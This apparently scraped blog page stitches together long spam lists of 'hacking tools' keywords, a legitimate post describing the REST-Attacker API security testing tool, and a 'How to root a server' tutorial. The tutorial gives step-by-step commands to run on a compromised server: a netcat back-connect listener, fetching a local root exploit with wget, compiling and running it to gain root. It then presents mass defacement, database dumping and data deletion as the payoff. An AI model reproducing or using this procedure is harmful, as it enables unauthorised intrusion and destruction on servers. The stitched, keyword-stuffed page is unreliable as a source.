TIME

NEPAL QATAR BELFAST, UK MALAYSIA DUBAI

Thursday, January 25, 2024

OWASP API Security Project Media Coverage



A list of must read articles on OWASP API Security Project

Continue reading


  1. Hacking Tools Online
  2. Pentest Tools Android
  3. Termux Hacking Tools 2019
  4. Pentest Tools Alternative
  5. Hacking Tools Online
  6. Hacking Tools Usb
  7. Hacking Tools For Windows
  8. Hacking Tools For Windows 7
  9. Hacking Tools Online
  10. Hacker Hardware Tools
  11. Growth Hacker Tools
  12. Pentest Tools For Mac
  13. Hacking Tools And Software
  14. How To Install Pentest Tools In Ubuntu
  15. Install Pentest Tools Ubuntu
  16. Hack App
  17. Hacker Tools
  18. Hacking Tools Software
  19. Kik Hack Tools
  20. Hacker Tools Apk Download
  21. Hacker Tools Apk
  22. Pentest Recon Tools
  23. Hack Apps
  24. Pentest Tools For Ubuntu
  25. Pentest Tools Android
  26. Blackhat Hacker Tools
  27. Pentest Tools Free
  28. Hack Tools For Windows
  29. Hack Tools Mac
  30. How To Hack
  31. Best Hacking Tools 2019
  32. Pentest Recon Tools
  33. Tools 4 Hack
  34. What Are Hacking Tools
  35. Hack Website Online Tool
  36. Install Pentest Tools Ubuntu
  37. Hacking Tools Software
  38. Hacking Tools Usb
  39. Tools For Hacker
  40. Ethical Hacker Tools
  41. New Hacker Tools
  42. Hack Tools For Mac
  43. Hacker Tools 2020
  44. Physical Pentest Tools
  45. Hacker Security Tools
  46. Install Pentest Tools Ubuntu
  47. Underground Hacker Sites
  48. Growth Hacker Tools
  49. Pentest Automation Tools
  50. How To Install Pentest Tools In Ubuntu
  51. Hack Apps
  52. Hacker Tools Windows
  53. Pentest Tools Website Vulnerability
  54. Wifi Hacker Tools For Windows
  55. Hack Website Online Tool
  56. Game Hacking
  57. Hacker Tools Linux
  58. Hacking Tools Download
  59. Hack Tools Pc
  60. How To Hack
  61. Pentest Tools Alternative
  62. Hack Tools Download
  63. Hacker Tools Software
  64. Hacker Security Tools
  65. Hack Tools For Mac
  66. Pentest Tools Port Scanner
  67. Pentest Automation Tools
  68. Hack Apps
  69. Pentest Tools Open Source
  70. Hacking Tools Usb
  71. Hackers Toolbox
  72. Android Hack Tools Github
  73. Hacking Tools Mac
  74. Black Hat Hacker Tools
  75. Hacker
  76. Pentest Tools Online
  77. Hacking Tools For Windows
  78. Pentest Tools Tcp Port Scanner
  79. Hacker Tools Hardware
  80. Hack Tools For Mac
  81. Pentest Tools Apk
  82. Hack Apps
  83. Hacker Tools For Ios
  84. Pentest Tools Framework
  85. Pentest Tools For Mac
  86. Hacking Tools Free Download
  87. Pentest Tools Alternative
  88. Best Hacking Tools 2020
  89. Hack Website Online Tool
  90. Hacking Tools Github
  91. Hacking Tools Github
  92. Hacking Tools Usb
  93. Hacking Tools For Mac
  94. Hack Tools For Windows
  95. Tools Used For Hacking
  96. Hack Apps
  97. Hacker Tools For Pc
  98. Hacker
  99. Top Pentest Tools
  100. Hacking Tools For Windows Free Download
  101. Tools Used For Hacking
  102. Pentest Tools Free
  103. Hacker Tools Apk
  104. Hack Tools For Pc
  105. Pentest Tools Windows
  106. Hacking Tools Windows
  107. Pentest Tools Website Vulnerability
  108. Pentest Tools Open Source
  109. Pentest Tools Tcp Port Scanner
  110. Hack Website Online Tool
  111. How To Make Hacking Tools
  112. Pentest Tools Kali Linux
  113. Hacking Tools Pc
  114. Hacking Tools
  115. Hacker Tools Free Download
  116. Hacking Tools
  117. Pentest Tools
  118. Hak5 Tools
  119. Install Pentest Tools Ubuntu
  120. Pentest Tools For Android
  121. Hacking App
  122. Hacker Search Tools
  123. Hacker Tools Apk
  124. Github Hacking Tools
  125. Pentest Tools For Mac
  126. Hacking Tools Pc
  127. Pentest Tools Windows
  128. Hack Tools For Pc
  129. Hacker Tools
  130. Hacker Tools Hardware
  131. Hackers Toolbox
  132. Pentest Tools Kali Linux
  133. Underground Hacker Sites
  134. Hacker Tools Free Download
  135. Hacking Tools For Beginners
  136. Tools Used For Hacking
  137. Pentest Tools Online
  138. Best Hacking Tools 2019
  139. Hack Tools Mac
  140. Hacker Tools Hardware
  141. Pentest Tools Subdomain
  142. Hacking Apps
  143. Hack Tools For Ubuntu
  144. Hacker Tools Software
  145. Hacking Tools For Mac
  146. Nsa Hack Tools
  147. Hacking Tools Windows 10
  148. Best Hacking Tools 2019
  149. Pentest Tools Website Vulnerability
  150. Hacker Tools Hardware
  151. Termux Hacking Tools 2019
  152. Hack Tools 2019
  153. How To Install Pentest Tools In Ubuntu
  154. Pentest Automation Tools
  155. What Is Hacking Tools
  156. Nsa Hack Tools Download
  157. Best Pentesting Tools 2018
  158. Hacks And Tools
  159. Pentest Tools Apk
  160. Hacks And Tools
  161. Hacker Tools Free
  162. Growth Hacker Tools

Automating REST Security Part 2: Tool-based Analysis With REST-Attacker

Our previous blog post described the challenges in analyzing REST API implementations. Despite the lack of REST standardization, we learned that similarities between implementations exist and that we can utilize them for tool-based REST security analysis.

This blog post will now look at our own implementation. REST-Attacker is a free software analysis tool specifically built to analyze REST API implementations and their access control measures. Using REST-Attacker as an example, this blog post will discuss how a REST security tool can work and where it can improve or streamline the testing process, especially in terms of automation.

Author

Christoph Heine

Overview

 Premise

REST-Attacker was developed as part of a master's thesis at the Chair for Network & Data Security at the Ruhr University Bochum. The primary motivation behind creating REST-Attacker was to evaluate how far we could push automation for REST security analysis. Hence, REST-Attacker provides several automation features such as automated test generation, test execution, and API communication. The tool essentially takes a "lazy tester" approach that tries to minimize the necessary amount of manual interaction as much as possible.

Creating a test run requires an OpenAPI file describing the REST API. Optional configuration, such as authentication credentials, can be provided to access protected API endpoints or run advanced test cases. Based on the API description and configuration, the tool can automatically generate complete test runs and execute them automatically. For this purpose, the current release version provides 32 built-in security test cases for analyzing various security issues and best practices.

How Testing Works

REST-Attacker can be used as a stand-alone CLI tool or as a Python module for integration in your own toolchain. In this blog post, we will mainly focus on running the tool via CLI. If you want to learn more about advanced usage, we recommend you read the docs.

Starting a basic test run looks like this:

python3 -m rest_attacker openapi.json --generate 

openapi.json is an OpenAPI file that describes the API we want to test. The --generate flag activates load-time test generation to automatically create a test run. In practice, this means that the tool passes the OpenAPI file to a test generation function of every available test case, which then returns a list of tests for the specific API. After creating the test run, REST-Attacker executes all tests one by one and saves the results.

There's also a second option for run-time test generation using the --propose flag:

python3 -m rest_attacker openapi.json --generate --propose 

In comparison to --generate, which creates tests from the OpenAPI description before starting the test run, --propose generates tests during a test run by considering the results of already executed tests. This option can be useful for some test cases where we want to take the responses of the API into account and run a follow-up test based on the observed behavior.

Both test generation methods can significantly speed up testing because they allow the creation of entire test runs without manual input. However, their feasibility often heavily depends on the verbosity and accuracy of the configuration data. Remember that many definitions, such as security requirements, are optional in the OpenAPI format, i.e., services can choose to omit them. API descriptions can also be outdated or contain errors, particularly if they are unofficial user-created versions. Despite all these limitations, an automated generation often works surprisingly well.

If you don't want to use the tool's generators, test runs can also be specified manually. For this purpose, you just pass a list of tests, including their serialized input parameters, via a config file:

python3 -m rest_attacker openapi.json --run example_run.json 

Advanced Automation

So far, we have only covered the automation of the test generation. However, what's even more interesting is that we can also automate much of the test execution process in REST-Attacker. The challenging part here is the streamlining of API communication. If you remember our previous blog post, you know that it basically involves these three steps:

  1. Preparing API request parameters
  2. Preparing access control data (handling authentication/authorization)
  3. Sending the request

Since most REST APIs are HTTP-based, step 3. is relatively trivial as any standard HTTP library will do the job. For example, REST-Attacker uses the popular Python requests module for its request backend. Step 1. is part of the test generation process and can be realized by using information from the machine-readable OpenAPI file, which we've already discussed. In the final step, we have to look at the access control (step 2.), which is especially relevant for security testing. Unfortunately, it is a bit more complex.

The problem is generally not that REST APIs use different access control methods. They are either standardized (HTTP Basic Auth, OAuth2) or extremely simple (API keys). Instead, complications often arise from the API-specific configuration and requirements for how these methods should be used and how credentials are integrated into the API request. For example, implementations may decide:

  • where credentials are located in the HTTP request (e.g., header, query, cookie, ...)
  • how credentials are encoded/formatted (e.g., Base64 encoding or use of keywords)
  • whether a combination of methods is required (e.g., API key + OAuth2)
  • (OAuth2) which authorization flows are supported
  • (OAuth2) which access scopes are supported
  • ...

Thereby, we cannot rely on an access control method, e.g., OAuth2, being used in the same way across different APIs. Furthermore, a lot of this information cannot be described in the OpenAPI format, so we have to find another solution. In REST-Attacker, we solve this problem with an additional custom configuration for access control. An example can be seen below (unfold it):

{     "schemes": {         "scheme0": {             "type": "header",             "key_id": "authorization",             "payload": "token {0}",             "params": {                 "0": {                     "id": "access_token",                     "from": [                         "token0",                     ]                 }             }         }     },     "creds": {         "client0": {             "type": "oauth2_client",             "description": "OAuth Client",             "client_id": "aabbccddeeff123456789",             "client_secret": "abcdef12345678998765431fedcba",             "redirect_uri": "https://localhost:1234/test/",             "authorization_endpoint": "https://example.com/login/oauth/authorize",             "token_endpoint": "https://example.com/login/oauth/token",             "grants": [                 "code",                 "token"             ],             "scopes": [                 "user"             ],             "flags": []         }     },     "required_always": {         "setting0": [             "scheme0"         ]     },     "required_auth": {},     "users": {         "user0": {             "account_id": "user",             "user_id": "userXYZ",             "owned_resources": {},             "allowed_resources": {},             "sessions": {                 "gbrowser": {                     "type": "browser",                     "exec_path": "/usr/bin/chromium",                     "local_port": "1234"                 }             },             "credentials": [                 "client0"             ]         }     } } 

The config file contains everything required for getting access to the API. schemes define location and encoding of credentials in the HTTP request, while credentials contain login credentials for either users or OAuth2 clients. There are also definitions for the required access control schemes for general access to the API (required_always) as well as for user-protected access (required_auth). For the purpose of authorization, we can additionally provide user definitions with session information. The latter can be used to create or access an active user session to retrieve OAuth2 tokens from the service.

Starting REST-Attacker with an access control config is similar as before. Instead of only passing the OpenAPI file, we use a folder that contains all configuration files:

python3 -m rest_attacker cfg/example --generate 

REST-Attacker completely handles all access control requirements in the background. Manual intervention is sometimes necessary, e.g., when there's a confirmation page for OAuth2 authorization. However, most of the steps, from selecting the proper access control schemes to retrieving OAuth2 tokens and creating the request payload, are all handled by REST-Attacker.

Interpreting Results

After a test run, REST-Attacker exports the test results to a report file. Every report gives a short summary of the test run and the results for each executed test case. Here you can see an example of a report file (unfold it):

{     "type": "report",     "stats": {         "start": "2022-07-16T14-27-20Z",         "end": "2022-07-16T14-27-25Z",         "planned": 1,         "finished": 1,         "skipped": 0,         "aborted": 0,         "errors": 0,         "analytical_checks": 0,         "security_checks": 1     },     "reports": [         {             "check_id": 0,             "test_type": "security",             "test_case": "https.TestHTTPAvailable",             "status": "finished",             "issue": "security_flaw",             "value": {                 "status_code": 200             },             "curl": "curl -X GET http://api.example.com/user",             "config": {                 "request_info": {                     "url": "http://api.example.com",                     "path": "/user",                     "operation": "get",                     "kwargs": {                         "allow_redirects": false                     }                 },                 "auth_info": {                     "scheme_ids": null,                     "scopes": null,                     "policy": "DEFAULT"                 }             }         }     ] } 

Individual test reports contain a basic classification of the detected behavior in the issue parameter and the detailed reasons for this interpretation in the value object. The meaning of the classification depends on the test case ID, which is stored in the test_case parameter. In the example above, the https.TestHTTPAvailable checks if an API endpoint is accessible via plain HTTP without transport security (which is generally considered unsafe). The API response is an HTTP message with status code 200, so REST-Attacker classifies the behavior as a flaw.

By default, reports also contain every test's configuration parameters and can be supplied back to the tool as a manual test run configuration. This is very useful if we want to reproduce a run to see if detected issues have been fixed.

python3 -m rest_attacker openapi.json --run report.json 

Conclusion

By now, you should know what REST API tools like REST-Attacker are capable of and how they can automate the testing process. In our next and final blog post, we will take a deeper look at practical testing with the REST-Attacker. To do this, we will present security test categories that are well-suited for tool-based analysis and investigate how we can apply them to test several real-world API implementations.

Acknowledgement

The REST-Attacker project was developed as part of a master's thesis at the Chair of Network & Data Security of the Ruhr University Bochum. I would like to thank my supervisors Louis Jannett, Christian Mainka, Vladislav Mladenov, and Jörg Schwenk for their continued support during the development and review of the project.

More info


HOW TO ROOT A SERVER? – SERVER ROOTING

Servers serve the requests made by the users to the web pages, it acts as a helping hand who serves the requested meal for you. Here I am sharing how to root a server. Root is the Administrator of all server. If someone got root access to it, he can do anything with a server like delete and copy anything on the server, can deface all the websites (massive deface ).
We can't talk about root on windows. That enough for a beginner because if I talk about the root I need another book. So, I guess now we know the importance of root access and why we try to get root.

HOW TO ROOT A SERVER?

There are 3 ways to get ROOT on the server :
1 – With local Root.
2 – With SQL by reading the same important files on it root password.
3 – With exploit on software (Buffer Overflow).
In this post, we will explain local Root. I will explain the other ways soon in some other post.
OK, let's back to work.
After Uploading your shell on the server and getting the local root you will do a back connect and run the local root to Get root. This is a small idea of how it works in the next step you will see how to
find local root and run it to get root access.

HOW TO SEARCH LOCAL ROOT?

First of all we you need to know what version of Kernel.
You can know that from your shell, for example, this version is 2.6.18 – 2012
Go to EXECUTE on your shell and write  "uname -a". You will get the same result, by the way.
Now how to find the local root.
You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc who provides these local roots. One more thing to notice is, that there exist two types of local roots :
1. Local.C: which are not ready.
2. Local: ready to use.

HOW TO GET ROOT ACCESS?

First, you need a shell with a Back Connect option like this :
Enter your "Public IP Address" in SERVER, the port you want to connect on and leave it, Perl, this time, and Finally connect.
So now you must receive the back connect with a Tool named netcat u can download it from the
net. After that open your terminal if you are under Linux or CMD  if you are under Windows. I will explain only Linux, and for Windows, its all the same.
After that Follow the steps :
1- Press nc -vlp 433
2- Wget [the link of the local-Root.zip]
3 – unzip local-Root.zip

4 – chmod 777 local.c

5 – now to change the local-root from local.c > local
gcc local.c -o local Then you will find local.c transformed to local

6 – chmod 777 local

7 – ./local to local rootwork

8 – su
then see your id uid=0(root) gid=0(root) groups=0(root)


Getting UID=0 means, u had got root privileges and hence can do a variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.
AFTER THE ROOT 
As server gets rooted, you're able to do the many things with it like I mentioned above. Such as, withdrawal of domains, massive deface and also deletion of the data completely.
More articles
  1. Hack Website Online Tool
  2. Hacking Tools And Software
  3. Hack Tools
  4. Hack Tools Pc
  5. Hacking App
  6. Hack Tools
  7. Pentest Tools Windows
  8. Termux Hacking Tools 2019
  9. Hacking Tools For Games
  10. Hacker Tools Hardware
  11. Hacking Tools Mac
  12. Hacking Tools For Games
  13. Hacking Tools Pc
  14. Hack Tools For Pc
  15. Easy Hack Tools
  16. Hack Tools For Mac
  17. Best Hacking Tools 2020
  18. Hacking Tools Download
  19. Hack Tools Github
  20. Physical Pentest Tools
  21. Hacking Tools Kit
  22. Pentest Tools Port Scanner
  23. Pentest Tools For Ubuntu
  24. Hacking Tools For Pc
  25. Growth Hacker Tools
  26. How To Hack
  27. Pentest Tools Android
  28. Android Hack Tools Github
  29. Hack Tool Apk No Root
  30. Hacking Tools For Beginners
  31. Hacker Tool Kit
  32. Pentest Reporting Tools
  33. Hacker Techniques Tools And Incident Handling
  34. Hacker Tools List
  35. Hacking Tools Free Download
  36. Hack And Tools
  37. Hacking Tools Name
  38. Best Hacking Tools 2019
  39. Growth Hacker Tools
  40. Pentest Tools Windows
  41. Hacker Tools For Pc
  42. Hacking Tools Windows 10
  43. Pentest Box Tools Download
  44. Hak5 Tools
  45. Pentest Tools Linux
  46. Hacker Tools Software
  47. Hack Tools Online
  48. How To Hack
  49. Hacker Tools Software
  50. Hacking Tools Usb
  51. Hack Tools For Games
  52. Pentest Tools For Ubuntu
  53. Hacking Tools Kit
  54. Pentest Box Tools Download
  55. Hacker Tools Linux
  56. Growth Hacker Tools
  57. Hack Tools
  58. Pentest Tools For Android
  59. Pentest Tools Free
  60. Top Pentest Tools
  61. Pentest Tools Url Fuzzer
  62. Hacker Tools Free
  63. Hacking Tools For Games
  64. Hacking App
  65. Hack Tools For Pc
  66. Pentest Tools
  67. Hacker Tools 2019
  68. Wifi Hacker Tools For Windows
  69. Pentest Tools Free